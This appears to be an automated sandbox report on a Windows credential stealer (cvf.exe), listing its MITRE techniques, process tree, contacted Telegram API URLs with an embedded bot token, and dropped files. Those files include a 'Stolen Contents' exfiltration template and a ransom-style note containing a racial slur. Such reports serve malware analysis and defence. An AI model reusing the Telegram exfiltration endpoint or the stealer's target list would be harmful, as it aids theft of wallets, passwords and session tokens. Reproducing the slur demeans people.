Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\curl.exeQueries volume information: C:\Users\user\Desktop\log.zip VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\curl.exeQueries volume information: C:\Users\user\Desktop\log.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\cvf.exeCode function: 0_2_00BC971B GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00BC971B
Source: C:\Windows\SysWOW64\curl.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
Windows Management Instrumentation		1
DLL Side-Loading		11
Process Injection		1
Masquerading		OS Credential Dumping1
System Time Discovery		Remote Services1
Archive Collected Data		1
Web Service		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading		31
Virtualization/Sandbox Evasion		LSASS Memory31
Security Software Discovery		Remote Desktop ProtocolData from Removable Media11
Encrypted Channel		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
Process Injection		Security Account Manager1
Process Discovery		SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Deobfuscate/Decode Files or Information		NTDS31
Virtualization/Sandbox Evasion		Distributed Component Object ModelInput Capture3
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
Obfuscated Files or Information		LSA Secrets1
Application Window Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
DLL Side-Loading		Cached Domain Credentials1
System Network Configuration Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync1
File and Directory Discovery		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem53
System Information Discovery		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1636485 Sample: cvf.exe Startdate: 12/03/2025 Architecture: WINDOWS Score: 72 44 api.telegram.org 2->44 46 resolver1.opendns.com 2->46 60 Suricata IDS alerts for network traffic 2->60 62 Multi AV Scanner detection for submitted file 2->62 64 Joe Sandbox ML detected suspicious sample 2->64 9 cvf.exe 2 2->9         started        signatures3 66 Uses the Telegram API (likely for C&C communication) 44->66 process4 process5 11 cvf.exe 9 9->11         started        13 conhost.exe 9->13         started        process6 15 cmd.exe 1 11->15         started        18 cmd.exe 11->18         started        20 cmd.exe 1 11->20         started        22 6 other processes 11->22 signatures7 70 Uses nslookup.exe to query domains 15->70 24 nslookup.exe 1 15->24         started        38 2 other processes 15->38 27 nslookup.exe 1 18->27         started        40 2 other processes 18->40 29 powershell.exe 52 20->29         started        32 curl.exe 1 22->32         started        34 curl.exe 1 22->34         started        36 curl.exe 1 22->36         started        42 3 other processes 22->42 process8 dnsIp9 48 222.222.67.208.in-addr.arpa 24->48 50 myip.opendns.com 24->50 52 222.222.67.208.in-addr.arpa 27->52 54 myip.opendns.com 27->54 68 Loading BitLocker PowerShell Module 29->68 56 api.telegram.org 149.154.167.220, 443, 49723, 49726 TELEGRAMRU United Kingdom 32->56 58 127.0.0.1 unknown unknown 32->58 signatures10

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
cvf.exe15%VirustotalBrowse
cvf.exe11%ReversingLabs

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
myip.opendns.com
54.38.153.202
truefalse
    		high
    resolver1.opendns.com
    		208.67.222.222
    		truefalse
      		high
      api.telegram.org
      		149.154.167.220
      		truefalse
        		high
        222.222.67.208.in-addr.arpa
        		unknown
        		unknowntrue
          		unknown

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          https://api.telegram.org/bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH0kuJf2QragE/sendDocumentfalse
            		high
            https://api.telegram.org/bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH0kuJf2QragE/sendMessagefalse
              		high

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              https://api.telegram.org/bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH0kuJf2QragEathcvf.exe, 00000002.00000002.1443455821.0000000000D07000.00000004.00000020.00020000.00000000.sdmpfalse
                		high
                https://api.telegram.org/bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH0kuJf2QragE/sendMessageapi.telegram.ocurl.exe, 00000013.00000003.1277931569.00000000031E9000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000013.00000002.1278161915.00000000031E9000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000013.00000003.1277913522.00000000031E8000.00000004.00000020.00020000.00000000.sdmpfalse
                  		high
                  https://t.me/fakecloudflareLogcvf.exefalse
                    		high
                    https://api.telegram.org/botcvf.exefalse
                      		high
                      https://api.telegram.org/bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH0kuJf2QragE/sendDocument-Fchat_id=-Fdcurl.exe, 00000020.00000002.1443059234.0000000002A40000.00000004.00000020.00020000.00000000.sdmpfalse
                        		high
                        https://api.telegram.org/botCaliforniaUnitedcvf.exefalse
                          		high
                          https://api.telegram.org/bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH0kuJf2QragE/sendDocument-Fchat_id=-47curl.exe, 0000001E.00000002.1414619345.00000000029B0000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            https://api.telegram.org/bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH0kuJf2QragE/sendMessage-HContent-Typecurl.exe, 00000008.00000002.1184435257.0000000002DD0000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000A.00000002.1217555905.0000000003630000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000011.00000002.1245625646.0000000003070000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000013.00000002.1278161915.00000000031D0000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              https://api.telegram.org/bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH0kuJf2QragE/sendMessageFcurl.exe, 00000011.00000003.1245496882.0000000003080000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                https://api.telegram.org/bot8194646631:AAFjEFZ0QTQqIKRDV84msNAHcurl.exe, 00000020.00000002.1443059234.0000000002A53000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000020.00000003.1442886383.0000000002A50000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  https://api.telegram.org/botExecutingcvf.exefalse
                                    		high
                                    https://api.telegram.org/bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH%curl.exe, 00000020.00000002.1443059234.0000000002A53000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000020.00000003.1442886383.0000000002A50000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      https://api.telegram.org/bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH0kuJf2QragEcvf.exe, 00000002.00000002.1443455821.0000000000D07000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        https://t.me/fakecloudflarecvf.exe, READ_ME.txt.2.drfalse
                                          		high

                                          World Map of Contacted IPs

                                          • No. of IPs < 25%
                                          • 25% < No. of IPs < 50%
                                          • 50% < No. of IPs < 75%
                                          • 75% < No. of IPs

                                          Public IPs

                                          IPDomainCountryFlagASNASN NameMalicious
                                          149.154.167.220
                                          		api.telegram.orgUnited Kingdom
                                          		62041TELEGRAMRUfalse

                                          Private

                                          IP
                                          127.0.0.1

                                          General Information

                                          Joe Sandbox version:42.0.0 Malachite
                                          Analysis ID:1636485
                                          Start date and time:2025-03-12 20:14:01 +01:00
                                          Joe Sandbox product:CloudBasic
                                          Overall analysis duration:0h 6m 29s
                                          Hypervisor based Inspection enabled:false
                                          Report type:full
                                          Cookbook file name:default.jbs
                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                          Run name:Run with higher sleep bypass
                                          Number of analysed new started processes analysed:36
                                          Number of new started drivers analysed:0
                                          Number of existing processes analysed:0
                                          Number of existing drivers analysed:0
                                          Number of injected processes analysed:0
                                          Technologies:
                                          • HCA enabled
                                          • EGA enabled
                                          • AMSI enabled
                                          Analysis Mode:default
                                          Analysis stop reason:Timeout
                                          Sample name:cvf.exe
                                          Detection:MAL
                                          Classification:mal72.troj.evad.winEXE@47/13@9/2
                                          EGA Information:
                                          • Successful, ratio: 100%
                                          HCA Information:
                                          • Successful, ratio: 98%
                                          • Number of executed functions: 14
                                          • Number of non-executed functions: 72
                                          Cookbook Comments:
                                          • Found application associated with file extension: .exe
                                          • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                          • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored

                                          Warnings

                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                          • Excluded IPs from analysis (whitelisted): 20.12.23.50, 40.69.42.241, 52.165.164.15, 23.199.214.10
                                          • Excluded domains from analysis (whitelisted): a-ring-fallback.msedge.net, fe3.delivery.mp.microsoft.com, fs.microsoft.com, slscr.update.microsoft.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, d.4.1.9.1.6.7.1.0.0.0.0.0.0.0.0.1.0.0.9.0.0.1.f.1.1.1.0.1.0.a.2.ip6.arpa, glb.sls.prod.dcat.dsp.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                          • Not all processes where analyzed, report is missing behavior information
                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                          • Report size getting too big, too many NtCreateKey calls found.

                                          Simulations

                                          Behavior and APIs

                                          No simulations

                                          Joe Sandbox View / Context

                                          IPs

                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          149.154.167.220Payment_Advise.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                            4500149631.vbeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                              WizClient.exeGet hashmaliciousXWormBrowse
                                                1.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                  #U0420#U0430#U0442#U043a#U0430.exeGet hashmaliciousXWormBrowse
                                                    https://nr.chadwickbarros.cl/Get hashmaliciousUnknownBrowse
                                                      R9rwNLVzpr.exeGet hashmaliciousPhemedrone StealerBrowse
                                                        nobtpajdjthawd.exeGet hashmaliciousKeyzetsu ClipperBrowse
                                                          KoaguarLoader.exeGet hashmaliciousSalat Stealer, XWormBrowse

                                                            Domains

                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            resolver1.opendns.comlaHk5V2vfR.exeGet hashmaliciousBTC, Coinhive, LummaC Stealer, Sapphire, XmrigBrowse
                                                            • 208.67.222.222
                                                            main_x86.dllGet hashmaliciousUnknownBrowse
                                                            • 208.67.222.222
                                                            main_x86.dllGet hashmaliciousUnknownBrowse
                                                            • 208.67.222.222
                                                            main_x86.dllGet hashmaliciousUnknownBrowse
                                                            • 208.67.222.222
                                                            main_x86.dllGet hashmaliciousUnknownBrowse
                                                            • 208.67.222.222
                                                            36599208287637_182387937827.vbsGet hashmaliciousGozi, Ursnif, AmadeyBrowse
                                                            • 208.67.222.222
                                                            hkN23TcCdh.exeGet hashmaliciousUnknownBrowse
                                                            • 208.67.222.222
                                                            hkN23TcCdh.exeGet hashmaliciousUnknownBrowse
                                                            • 208.67.222.222
                                                            TS-240730-ShellCode3.exeGet hashmaliciousUnknownBrowse
                                                            • 208.67.222.222
                                                            api.telegram.orgPayment_Advise.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                            • 149.154.167.220
                                                            4500149631.vbeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                            • 149.154.167.220
                                                            WizClient.exeGet hashmaliciousXWormBrowse
                                                            • 149.154.167.220
                                                            1.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 149.154.167.220
                                                            #U0420#U0430#U0442#U043a#U0430.exeGet hashmaliciousXWormBrowse
                                                            • 149.154.167.220
                                                            https://nr.chadwickbarros.cl/Get hashmaliciousUnknownBrowse
                                                            • 149.154.167.220
                                                            R9rwNLVzpr.exeGet hashmaliciousPhemedrone StealerBrowse
                                                            • 149.154.167.220
                                                            nobtpajdjthawd.exeGet hashmaliciousKeyzetsu ClipperBrowse
                                                            • 149.154.167.220
                                                            KoaguarLoader.exeGet hashmaliciousSalat Stealer, XWormBrowse
                                                            • 149.154.167.220
                                                            myip.opendns.comlaHk5V2vfR.exeGet hashmaliciousBTC, Coinhive, LummaC Stealer, Sapphire, XmrigBrowse
                                                            • 54.38.153.202
                                                            main_x86.dllGet hashmaliciousUnknownBrowse
                                                            • 146.70.131.148
                                                            main_x86.dllGet hashmaliciousUnknownBrowse
                                                            • 146.70.131.148
                                                            main_x86.dllGet hashmaliciousUnknownBrowse
                                                            • 146.70.131.148
                                                            main_x86.dllGet hashmaliciousUnknownBrowse
                                                            • 146.70.131.148
                                                            36599208287637_182387937827.vbsGet hashmaliciousGozi, Ursnif, AmadeyBrowse
                                                            • 146.70.131.148
                                                            hkN23TcCdh.exeGet hashmaliciousUnknownBrowse
                                                            • 54.38.153.202
                                                            hkN23TcCdh.exeGet hashmaliciousUnknownBrowse
                                                            • 54.38.153.202
                                                            TS-240730-ShellCode3.exeGet hashmaliciousUnknownBrowse
                                                            • 54.38.153.202

                                                            ASNs

                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            TELEGRAMRUPayment_Advise.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                            • 149.154.167.220
                                                            4500149631.vbeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                            • 149.154.167.220
                                                            M1gP5m86Gn.exeGet hashmaliciousLummaC StealerBrowse
                                                            • 149.154.167.99
                                                            ca703fd579bbcee73544b9b37f8a6469.bin.exeGet hashmaliciousLummaC StealerBrowse
                                                            • 149.154.167.99
                                                            DEVM24-clean.exeGet hashmaliciousLummaC StealerBrowse
                                                            • 149.154.167.99
                                                            WizClient.exeGet hashmaliciousXWormBrowse
                                                            • 149.154.167.220
                                                            kumori.exeGet hashmaliciousLummaC StealerBrowse
                                                            • 149.154.167.99
                                                            ShadowLoader.exeGet hashmaliciousLummaC StealerBrowse
                                                            • 149.154.167.99
                                                            1.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 149.154.167.220

                                                            JA3 Fingerprints

                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            74954a0c86284d0d6e1c4efefe92b521mal_temp.dotm.docGet hashmaliciousUnknownBrowse
                                                            • 149.154.167.220
                                                            SecuriteInfo.com.Variant.Zusy.582702.20219.11785.exeGet hashmaliciousUnknownBrowse
                                                            • 149.154.167.220
                                                            SecuriteInfo.com.Variant.Zusy.582702.20219.11785.exeGet hashmaliciousUnknownBrowse
                                                            • 149.154.167.220
                                                            1.exeGet hashmaliciousUnknownBrowse
                                                            • 149.154.167.220
                                                            Dropper.exeGet hashmaliciousAsyncRAT, Trap Stealer, XWormBrowse
                                                            • 149.154.167.220
                                                            setup.exeGet hashmaliciousUnknownBrowse
                                                            • 149.154.167.220
                                                            ggetokken.batGet hashmaliciousUnknownBrowse
                                                            • 149.154.167.220
                                                            hGlhyegaG6.exeGet hashmaliciousUnknownBrowse
                                                            • 149.154.167.220
                                                            1.exeGet hashmaliciousUnknownBrowse
                                                            • 149.154.167.220

                                                            Dropped Files

                                                            No context

                                                            Created / dropped Files

                                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):1796
                                                            Entropy (8bit):5.447245395150842
                                                            Encrypted:false
                                                            SSDEEP:48:FWSU4y4RQmFoUeWmfmZ9tK8NWR8nNskB690hyNZ:FLHyIFKL3OZ2KWRShyb
                                                            MD5:2B8E5E7BC16181AF1F47A02EC0786578
                                                            SHA1:22F1C96CE323A819B18AA2A0F49B5253B52C3E5B
                                                            SHA-256:572E009458C144CD011873692CABBF20B492424D10F1FB94706B239FBE8CA52F
                                                            SHA-512:058245D0162E44B0DEDBE14D921184A6A46320F750895F03DD8B9583254AE661A6C99158FB682B2D6B337125028CD65382FBFC877CDF256974B7C71B9484FE65
                                                            Malicious:false
                                                            Preview:@...e...........Z...............................................P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2f5tt03m.i5l.ps1

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gyn41urc.0sb.psm1

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nctb3tik.zv3.psm1

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tmd3q1my.b4c.ps1

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\Desktop\firstrun.txt

                                                            Download File
                                                            Process:C:\Users\user\Desktop\cvf.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:modified
                                                            Size (bytes):11
                                                            Entropy (8bit):3.0957952550009344
                                                            Encrypted:false
                                                            SSDEEP:3:gXT:gj
                                                            MD5:824D5FECDCD6BAA546E3ABA166D9C08D
                                                            SHA1:E4ACDDB5C876E62B8FA33F70EDD4C78A94896DFE
                                                            SHA-256:F807A86E144CDF96128BEC05A9E10A034AC3C485761568C92A164F3C458B3720
                                                            SHA-512:2500F320331B760731DFEEB1E7E158C9782374222207DCD8EAF8C0FF210B8D9D2DC2F1F2D72EB3B813C368D961828D680C6E6B773C337A466E2890ED2B020A1B
                                                            Malicious:false
                                                            Preview:already run

                                                            C:\Users\user\Desktop\log.zip

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                            Category:dropped
                                                            Size (bytes):180
                                                            Entropy (8bit):4.86904349285852
                                                            Encrypted:false
                                                            SSDEEP:3:vhjzJ/5wlml/QoDVvG6AveMN2KT8xuylnlkkxxltJ/5wlml/vDZgB+lFlA/:5jl/5wcl/nDYbQoMltxxl/5wcl/vDZix
                                                            MD5:A0F45CEF081AD8A774CEAA5F0232680C
                                                            SHA1:6F64A9688D715B6CA198EB0374CD1739F8620F43
                                                            SHA-256:547CABBC46DA2BACE81DB027D76288A7B4361068AAE463F049BB029A75E30C98
                                                            SHA-512:26F41CFA178A6AED37DFE4FFAE60EFA131DD877F3A74E9AE68C65C2272A791C0FD93754F8B17B548DA8E48B4DA9BC3357A7FDB83BB9182EF7F10FF764A3DEA30
                                                            Malicious:false
                                                            Preview:PK.........ylZ.m.i<...:.......READ_ME.txts..+QH./JO-Q(.W(...,Q..LOOT...())(.../..M.OK.NM../MI.I,J....PK...........ylZ.m.i<...:.....................READ_ME.txtPK..........9...e.....

                                                            C:\Users\user\Desktop\log\READ_ME.txt

                                                            Download File
                                                            Process:C:\Users\user\Desktop\cvf.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):58
                                                            Entropy (8bit):4.454085788830666
                                                            Encrypted:false
                                                            SSDEEP:3:6jEKMCCEEqWDbvjv:6jEKMCHEqWHjv
                                                            MD5:D14492639C5A06DA2E624090FDCE21BF
                                                            SHA1:BCBD5600F211BA6FC41681925801D9E5119B82D5
                                                            SHA-256:F365D57CC3E9DC4E9468D3296A98551C9FE685938B16707AA0B06070268EF70F
                                                            SHA-512:F89912924B038DED666B87D543E61319DD0085215B39C0571AA08021E1A817F9B902512E10CDB787AF0F6E948616ADB738EC8D284600009B8BBC57E6C120087A
                                                            Malicious:false
                                                            Preview:Dont forget to split nigga!..https://t.me/fakecloudflare..

                                                            C:\Users\user\Desktop\temp_payload.json

                                                            Download File
                                                            Process:C:\Users\user\Desktop\cvf.exe
                                                            File Type:JSON data
                                                            Category:dropped
                                                            Size (bytes):388
                                                            Entropy (8bit):5.326653378682866
                                                            Encrypted:false
                                                            SSDEEP:12:YGGcGyoMMOOC4x7RjDTkpiSiWLx0xAvj0q:YJ5yoZ1Tb6x0x4l
                                                            MD5:9C352C3864FC84E05CED677C9180C976
                                                            SHA1:7B02B2CC31AC3D7CD47D1D6045310C92813FF2AF
                                                            SHA-256:57AAA39F5E50226A1A9853ED736036B192A5D6AA2CAB7D2BAF8503D04B1F29A9
                                                            SHA-512:AB231B580042BC8E19B0E88D6DC8232CDD1FCFA25333E4C9037C2A65174823954FAFC9574DDA43E3AFE9A1437A78D5FBB2FA78491F07DE096F45B13B58FB1C12
                                                            Malicious:false
                                                            Preview:{"chat_id": "", "parse_mode": "HTML", "text": ".. Stolen Contents ..\n\n.. IP: Address: 208.67.222.222\nAddress: 54.38.153.202\n\n.. Wallet Extensions (0)\n\n.. Software Wallets (0)\n\n.. Cookies & Saved Passwords (0)\n... None (N/A)\n\n.. Telegram Sessions\n... 0 Session(s) Found\n\n.. Discord Tokens\n... 0 Account(s) Found\n\n.. Grabbed Files\n"}

                                                            \Device\ConDrv

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\nslookup.exe
                                                            File Type:ASCII text, with CRLF, CR line terminators
                                                            Category:dropped
                                                            Size (bytes):28
                                                            Entropy (8bit):4.039148671903071
                                                            Encrypted:false
                                                            SSDEEP:3:U+6QlBxAN:U+7BW
                                                            MD5:D796BA3AE0C072AA0E189083C7E8C308
                                                            SHA1:ABB1B68758B9C2BF43018A4AEAE2F2E72B626482
                                                            SHA-256:EF17537B7CAAB3B16493F11A099F3192D5DCD911C1E8DF0F68FE4AB6531FB43E
                                                            SHA-512:BF497C5ACF74DE2446834E93900E92EC021FC03A7F1D3BF7453024266349CCE39C5193E64ACBBD41E3A037473A9DB6B2499540304EAD51E002EF3B747748BF36
                                                            Malicious:false
                                                            Preview:Non-authoritative answer:...

                                                            Static File Info

                                                            General

                                                            File type:PE32 executable (console) Intel 80386, for MS Windows
                                                            Entropy (8bit):6.509613912012467
                                                            TrID:
                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                            • DOS Executable Generic (2002/1) 0.02%
                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                            File name:cvf.exe
                                                            File size:299'520 bytes
                                                            MD5:724d9557f66b00f2d74846e3e29434e6
                                                            SHA1:7edbf247b9cb9881c1888c4feaaee5fcb3af0254
                                                            SHA256:cc681954f48230c5a451104f96273baaab0d30d800732af5a1cf4e1eaf49d719
                                                            SHA512:63c14bda4fa40fa82ec0a1494dcfe98c719f745f9e1001ddd604eddc587eebce20b7611a68d08b8acd480bf3d8e50526b379df9bf1742fa8ca36f2bb1ecec0e0
                                                            SSDEEP:6144:UPEjjoaFQoVFUt4fg5Mdx2zJOuwUYpcNDpkhE:+EPnUt43wcomhE
                                                            TLSH:B8546C327380C071D4922173A66C9BA6977DB9304FA595CBABC44E3BDB607C1A631F1B
                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Zj.e...6...6...6Us.7...6Us.7...6Us.7...6...7...6...7...6...7O..6Us.7...6...6c..6...7...6..#6...6...7...6Rich...6........PE..L..

                                                            File Icon

                                                            Icon Hash:90cececece8e8eb0

                                                            Static PE Info

                                                            General

                                                            Entrypoint:0x418fbb
                                                            Entrypoint Section:.text
                                                            Digitally signed:false
                                                            Imagebase:0x400000
                                                            Subsystem:windows cui
                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
